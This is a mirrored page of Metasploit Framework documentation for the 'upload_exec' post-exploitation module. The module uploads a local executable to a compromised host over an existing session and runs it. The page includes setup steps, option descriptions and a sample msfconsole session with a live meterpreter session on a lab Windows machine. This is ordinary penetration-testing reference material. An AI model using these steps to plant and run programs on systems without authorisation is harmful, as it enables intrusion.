CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/multi/manage/upload_exec.md
Views: 1904

Vulnerable Application

This module allows you to upload a binary file, and automatically execute it.

The following platforms are supported:

  • Windows

  • Linux

  • OS X

Verification Steps

  1. Prepare for an executable file you wish to upload and execute.

  2. Obtain a session from the target machine.

  3. In msfconsole, do use post/multi/manage/upload_exec

  4. Set the LFILE option

  5. Set the RFILE option

  6. Set the SESSION option

  7. run

Options

LFILE

The file on your machine that you want to upload to the target machine.

RFILE

The file path on the target machine. This defaults to LFILE.

Scenarios

msf > use post/multi/manage/upload_exec
msf post(upload_exec) > show options

Module options (post/multi/manage/upload_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LFILE                     yes       Local file to upload and execute
   RFILE                     no        Name of file on target (default is basename of LFILE)
   SESSION                   yes       The session to run this module on.

msf post(upload_exec) > set lfile /tmp/
lfile => /tmp/
msf post(upload_exec) > set lfile /tmp/msg.exe
lfile => /tmp/msg.exe
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
rfile => C:\Users\sinn3r\Desktop\msg.exe
msf post(upload_exec) > sessions

Active sessions
===============

  Id  Type                     Information                               Connection
  --  ----                     -----------                               ----------
  1   meterpreter x86/windows  WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM  192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)

msf post(upload_exec) > set session 1
session => 1

msf post(upload_exec) > run

[-] Post interrupted by the console user
[*] Post module execution completed